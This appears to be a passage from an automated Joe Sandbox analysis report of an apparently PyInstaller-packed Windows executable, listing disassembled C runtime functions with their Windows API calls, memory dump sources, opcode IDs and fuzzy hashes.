                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3462794448-0
                                                                                                                                                                                                                                                                                • Opcode ID: e394586919bb787c5c57ed27fc0ac332066dc84938bb9692acbe845e24378f8e
                                                                                                                                                                                                                                                                                • Instruction ID: 87165f2fcf7662730264914245fe3515a5501b494c510bc5ccb73cd408c47cc8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e394586919bb787c5c57ed27fc0ac332066dc84938bb9692acbe845e24378f8e
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 56419262B1968291EAB0BF11A5407AAA394FF84BD4F848039EF8D677D9DE3CD501D720
                                                                                                                                                                                                                                                                                Function 00007FF7333AC1C8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392,?,?,?,?,00007FF7333A80CB), ref: 00007FF7333AC1D7
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392,?,?,?,?,00007FF7333A80CB), ref: 00007FF7333AC20D
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392,?,?,?,?,00007FF7333A80CB), ref: 00007FF7333AC23A
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392,?,?,?,?,00007FF7333A80CB), ref: 00007FF7333AC24B
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392,?,?,?,?,00007FF7333A80CB), ref: 00007FF7333AC25C
                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(?,?,?,00007FF7333A5E51,?,?,?,?,00007FF7333AB392,?,?,?,?,00007FF7333A80CB), ref: 00007FF7333AC277
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 2506987500-0
                                                                                                                                                                                                                                                                                • Opcode ID: 297eb830bf51183a03152683679a33ac8e7e939d0b2a29d40b44e033b6affbc9
                                                                                                                                                                                                                                                                                • Instruction ID: 231b752efe3a91f5ec64f96dcd75c20400312888857f6837d8005af300313213
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 297eb830bf51183a03152683679a33ac8e7e939d0b2a29d40b44e033b6affbc9
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C115124A0C24262FDF477A956511B9E2525F447B0F94C73CD83E7B6E6DE3CE841A320
                                                                                                                                                                                                                                                                                Function 00007FF7333AA9C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                • Opcode ID: f90418b582b416691a14bbb2ae6c6b71f2096e7654ee2338269033ad2dc175a6
                                                                                                                                                                                                                                                                                • Instruction ID: 2d2532fbde9b007dcdbd394cd0e3222ca29765ec9f614c5e7cfec70f5362ccfa
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f90418b582b416691a14bbb2ae6c6b71f2096e7654ee2338269033ad2dc175a6
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D2F06261B19642A1EAB4AF24E444339E360AF49761FD4863DC66E662E4DF3CD089D720
                                                                                                                                                                                                                                                                                Function 00007FF7333BA5D8 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _set_statfp
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1156100317-0
                                                                                                                                                                                                                                                                                • Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                                • Instruction ID: 8e20d20c79f2cc50276d4c96c92932557615c5aeecc73470be189f9cdb9ecff2
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A1151B2E5CE0321F6F43128D5A6375B8506F583B4FC4C63DE96E662D6CE7CA8416220
                                                                                                                                                                                                                                                                                Function 00007FF7333AC290 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,00007FF7333AB4E7,?,?,00000000,00007FF7333AB782,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AC2AF
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333AB4E7,?,?,00000000,00007FF7333AB782,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AC2CE
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333AB4E7,?,?,00000000,00007FF7333AB782,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AC2F6
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333AB4E7,?,?,00000000,00007FF7333AB782,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AC307
                                                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,00007FF7333AB4E7,?,?,00000000,00007FF7333AB782,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AC318
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                • Opcode ID: 336e871d9fe7b9feb1d4e8714057d4483739f4a760c37d9f3dc9b8317e64e27b
                                                                                                                                                                                                                                                                                • Instruction ID: ce09ed123c4a6380b85a855b91304270dbab00cca825417155db4c0668b76760
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 336e871d9fe7b9feb1d4e8714057d4483739f4a760c37d9f3dc9b8317e64e27b
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 46110D61E0C64262FAF8776995911B9A2415F447A0FD8C33CE87D7B7D6DE3CA841A320
                                                                                                                                                                                                                                                                                Function 00007FF7333AC124 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3702945584-0
                                                                                                                                                                                                                                                                                • Opcode ID: 4d8455bc275ec880ad9f8951d6e4f70d9feb0184cd7bbcf1a18e1e455a1bd2fd
                                                                                                                                                                                                                                                                                • Instruction ID: bf7e8adca2edd3ec4cfee50298b5ed4497e1e780ef3f3888d4064201d399d45c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4d8455bc275ec880ad9f8951d6e4f70d9feb0184cd7bbcf1a18e1e455a1bd2fd
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6811D314B0C20762F9F8B26959521B9A2824F44760FD8C73CE93E7A2D2DE3CB841A370
                                                                                                                                                                                                                                                                                Function 00007FF7333985B0 Relevance: 7.5, APIs: 5, Instructions: 36sleepthreadCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Window$Process$ConsoleCurrentShowSleepThread
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3908687701-0
                                                                                                                                                                                                                                                                                • Opcode ID: c4ce1bea477394a5bd7c29aaffed6a601c2f4b1d57d0592e327ceaa9095476a5
                                                                                                                                                                                                                                                                                • Instruction ID: bd85457cc4605e66d0a3eade4d037d46282adae7887d1769856f177eaefe5fd0
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c4ce1bea477394a5bd7c29aaffed6a601c2f4b1d57d0592e327ceaa9095476a5
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3A016220E1974292EAF46F25A484139A2A4EF84B81F849038D94F57664DE3CD445E720
                                                                                                                                                                                                                                                                                Function 00007FF7333A6F60 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: verbose
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-579935070
                                                                                                                                                                                                                                                                                • Opcode ID: 5742ae6ca51b03e9d6fd204cb41504e479b7e72b202bc53543779a715851f7d3
                                                                                                                                                                                                                                                                                • Instruction ID: 0b2f4029e3b011256ac21752685226ad64fe97c620de2e11a7c06c8d74c89d19
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5742ae6ca51b03e9d6fd204cb41504e479b7e72b202bc53543779a715851f7d3
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E891F432A0864661F7B5AEA4D49077DB3E5AB00B54FC4C13AEA6D633C5DF3CE401A320
                                                                                                                                                                                                                                                                                Function 00007FF7333B0E38 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                                                                • String ID: UTF-16LEUNICODE$UTF-8$ccs
                                                                                                                                                                                                                                                                                • API String ID: 3215553584-1196891531
                                                                                                                                                                                                                                                                                • Opcode ID: 59f559b3b4a43374a67f10f227721a3fbc4a07d852e694dccd2ae9d3b54f0314
                                                                                                                                                                                                                                                                                • Instruction ID: 403d2a3dd3be79751b935ad722e400baf1e790ec4aa68871bd91fe5372830479
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 59f559b3b4a43374a67f10f227721a3fbc4a07d852e694dccd2ae9d3b54f0314
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0C81A032E0C242A5F7F46E2A81142B8B7A0AB11B84FD5C13DDA0E77295CB3DE941B761
                                                                                                                                                                                                                                                                                Function 00007FF73339CBD8 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                • String ID: csm
                                                                                                                                                                                                                                                                                • API String ID: 2395640692-1018135373
                                                                                                                                                                                                                                                                                • Opcode ID: ab412f78eb90613ff4c98a1fac2d50a5770803065215d444c3ce453a3de23157
                                                                                                                                                                                                                                                                                • Instruction ID: 9b3a9d25391b6d1a4e1a5f057f55985ffa06629813584f82bc6a5517312b0ce1
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab412f78eb90613ff4c98a1fac2d50a5770803065215d444c3ce453a3de23157
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8951B132A19602EADBA4EF15D044B78BB91FB45B98F90C139DA4E57788DF3CE841D710
                                                                                                                                                                                                                                                                                Function 00007FF73339E468 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CallEncodePointerTranslator
                                                                                                                                                                                                                                                                                • String ID: MOC$RCC
                                                                                                                                                                                                                                                                                • API String ID: 3544855599-2084237596
                                                                                                                                                                                                                                                                                • Opcode ID: 2d0d38728c8b81eb1afee087d1255ca92539906646f1d2432080e5defd871a42
                                                                                                                                                                                                                                                                                • Instruction ID: 8a01d6bae20aec8c74e6fa6f75121a05c21bf2671e93b918b2442de6b4d37efc
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2d0d38728c8b81eb1afee087d1255ca92539906646f1d2432080e5defd871a42
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DF618F32909BC5D1D6B0AB15E4407AAF7A0FB84794F448629EB9C13BA5DF7CE190CB10
                                                                                                                                                                                                                                                                                Function 00007FF73339E818 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                                                                                                                                                                                                                                • String ID: csm$csm
                                                                                                                                                                                                                                                                                • API String ID: 3896166516-3733052814
                                                                                                                                                                                                                                                                                • Opcode ID: 881cb4ef47e13874d43f93ad661edca9df8e178c9ea1252ba64912ddd8f944cb
                                                                                                                                                                                                                                                                                • Instruction ID: ccac4aa825bc2a7012110ddc54e3f251be9be7f051d678c086cbb4806450a694
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 881cb4ef47e13874d43f93ad661edca9df8e178c9ea1252ba64912ddd8f944cb
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6A51A132909282E6EBF4AB569044778B794FB44B84F94C139DA9C67BE5CF3CE860D710
                                                                                                                                                                                                                                                                                Function 00007FF733392220 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 61COMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetCurrentProcessId.KERNEL32(FFFFFFFF,00000000,00000000,?,00000000,00007FF73339866F), ref: 00007FF73339226E
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CurrentProcess
                                                                                                                                                                                                                                                                                • String ID: %ls$WARNING$[PYI-%d:%ls]
                                                                                                                                                                                                                                                                                • API String ID: 2050909247-3372507544
                                                                                                                                                                                                                                                                                • Opcode ID: 92da2cbc5b979b0862b6cfd95371d042a7d5931ee882c49d5c626b31f152fc77
                                                                                                                                                                                                                                                                                • Instruction ID: ae42887fe154066b356715de44cca0a78eea566c40f391553b7ac0856764b020
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 92da2cbc5b979b0862b6cfd95371d042a7d5931ee882c49d5c626b31f152fc77
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6321C522A1CB82A1E6B0EB50F4412EAB364FF847C0F808139EA8D63A5ADE3CD115D750
                                                                                                                                                                                                                                                                                Function 00007FF7333AD4A0 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
